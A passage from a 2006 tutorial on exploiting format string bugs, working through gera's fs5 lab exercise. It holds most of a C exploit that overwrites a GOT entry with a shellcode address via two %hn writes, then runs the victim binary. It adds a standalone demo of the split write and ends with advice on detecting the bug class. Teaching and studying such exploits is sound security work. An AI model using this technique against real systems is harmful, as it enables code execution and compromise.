
Insecure Programming by Example: Format Strings (2)

2006-04-02 20:26:42  Source: WEB开发网


    if (i == 30) {
        /* The search loop above never saw our marker: the format string is not
         * at a stack position reachable with %N$, so the argument would need
         * padding to align it. Give up rather than guess. */
        printf("Can't find our format string in stack.\n");
        printf("Some padding may be needed. Aborting...\n");
        exit(1);
    }

    /* Locate the GOT slot to overwrite: "objdump -R fs5 | grep deregister"
     * prints the relocation for __deregister_frame_info, which the C runtime
     * calls on exit, i.e. after the vulnerable snprintf has already run.
     * The first field of that line is the slot's address. */
    sprintf(temp_buffer, "%s -R %s | %s deregister", OBJDUMP, VICTIM, GREP);
    f = popen(temp_buffer, "r");
    if (f == NULL || fscanf(f, "%8x", &deregister_address) != 1) {
        if (f)
            pclose(f);
        printf("Error: Cannot find deregister address in GOT!\n");
        exit(1);
    }
    pclose(f);

    printf("__deregister_frame_info address in GOT is: 0x%08x\n", deregister_address);
    printf("shellcode address in stack is: 0x%08x\n\n", ret);

    /* Split the value to be written into the two 16-bit halves that %hn stores. */
    first_half  = (ret & 0xffff0000) >> 16;
    second_half = (ret & 0x0000ffff);

    /* Evil buffer construction */
    p = evil_buffer;
    bzero(p, sizeof(evil_buffer));

    /* Destination of the first write: the high halfword of the GOT slot
     * (little-endian, so it lives at deregister_address + 2). */
    *((void **)p) = (void *)(deregister_address + 2);
    p += 4;

    /* Destination of the second write: the low halfword. */
    *((void **)p) = (void *)deregister_address;
    p += 4;

    /* Expands to  %.<first_half-8>d%<i+1>$hn%.<second_half-first_half>d%<i+2>$hn
     * The 8 address bytes already in the buffer count toward the first %hn,
     * hence "- 8". %hn only ever stores a growing count, so the second pad is
     * the difference between the halves; this assumes second_half >= first_half
     * (true for the stack address printed above). If it were not, the two
     * address/%hn pairs would have to be emitted in the opposite order.
     * %<i+1>$hn and %<i+2>$hn pick the two addresses at the head of evil_buffer
     * through the argument position found by the search loop above. */
    sprintf(p, "%%.%ud%%%d$hn%%.%ud%%%d$hn",
            first_half - 8, i + 1, second_half - first_half, i + 2);

    /* env carries the shellcode that ret points at. */
    execle("/home/user/gera/fs5", "fs5", evil_buffer, (char *)NULL, env);
}
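To make the two-halfword %hn write concrete, the following is an added example, not code from the original article or from gera's exercises. It performs the same split write into a local variable standing in for the GOT slot, but passes the destination pointers and pad widths as explicit printf arguments rather than digging them out of the stack, so there is no argument position to search for, and it writes the smaller half first, the ordering the exploit above assumes but does not check. It assumes a little-endian CPU and glibc, whose snprintf %n counts every character the call would have produced rather than only those that fit in the buffer, which is exactly why a size-limited snprintf is still exploitable. The addresses used in main are constructed values.

```c
#include <stdio.h>
#include <stdint.h>

/* Added example: write VALUE into *TARGET with two %hn conversions, one
 * 16-bit half at a time, as the exploit above does to a GOT slot.
 * Assumes a little-endian CPU and glibc, whose snprintf %n counts every
 * character the call would have produced, not just those that fit. */
int write_word_with_hn(uint32_t *target, uint32_t value)
{
    /* Little-endian: the low half lives at target, the high half at target+2. */
    short *lo_p = (short *)target;
    short *hi_p = (short *)((char *)target + 2);
    unsigned lo = value & 0xffffu;
    unsigned hi = value >> 16;

    /* %n delivers a running count that only grows, so emit the smaller half
     * first; the second pad is then just the difference between the halves. */
    unsigned first = lo, second = hi;
    short *first_p = lo_p, *second_p = hi_p;
    if (hi < lo) {
        first = hi;
        second = lo;
        first_p = hi_p;
        second_p = lo_p;
    }

    /* "%.Nd" applied to the value 0 prints exactly N characters, so the two
     * precisions fix the counts each %hn stores. They are passed as .*N$
     * arguments so the format itself stays a read-only literal, which
     * _FORTIFY_SOURCE requires before it lets %n through. */
    char out[32]; /* much smaller than the output; the dropped characters still count */
    snprintf(out, sizeof out, "%1$.*2$d%3$hn%1$.*4$d%5$hn",
             0, (int)first, first_p, (int)(second - first), second_p);

    return *target == value;
}

int main(void)
{
    uint32_t got_slot = 0;            /* stands in for the GOT entry */
    uint32_t shellcode = 0xbffffb30u; /* constructed stack address */
    int ok = write_word_with_hn(&got_slot, shellcode);
    printf("%s: slot now holds 0x%08x\n", ok ? "ok" : "FAIL", (unsigned)got_slot);
    return ok ? 0 : 1;
}
```

Because the destinations are ordinary arguments here, the two %hn conversions can be placed anywhere in the format; in the real exploit they must sit at the argument positions where the buffer itself lands on the stack, which is what the search loop and the i + 1 / i + 2 indices take care of.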

Conclusion

Format string vulnerabilities are comparatively easy to find (buffer overflows, by contrast, can be hard to spot even after a careful review of the source). Automated tools that scan code for this class of bug are usually useful; the pattern to look for is any printf-family call whose format argument is not a string literal, which gcc reports with -Wformat-security. So why are format string bugs considered such a serious threat? Because they came to attention late, not until 2000. Thanks to programmer laziness, a great many older daemons and applications contain format string bugs, and these bugs will inevitably cause many more security problems in the future.
References

1. Gera, "Insecure Programming by Example", http://community.core-sdi.com/~gera/InsecureProgramming/

2. scut, "Exploiting Format String Vulnerabilities", http://www.team-teso.net/releases/formatstring-1.2.tar.gz

3. Aleph One, "Smashing The Stack For Fun and Profit", http://www.phrack.com/phrack/49/P49-14

4. Linux Programmer's Manual, snprintf() function, http://www.die.net/doc/linux/man/man3/snprintf.3.html

5. Core Security Team, "Vulnerabilities in your code – Advanced Buffer Overflows", http://www.core-sec.com/examples/core_vulnerabilities.pdf
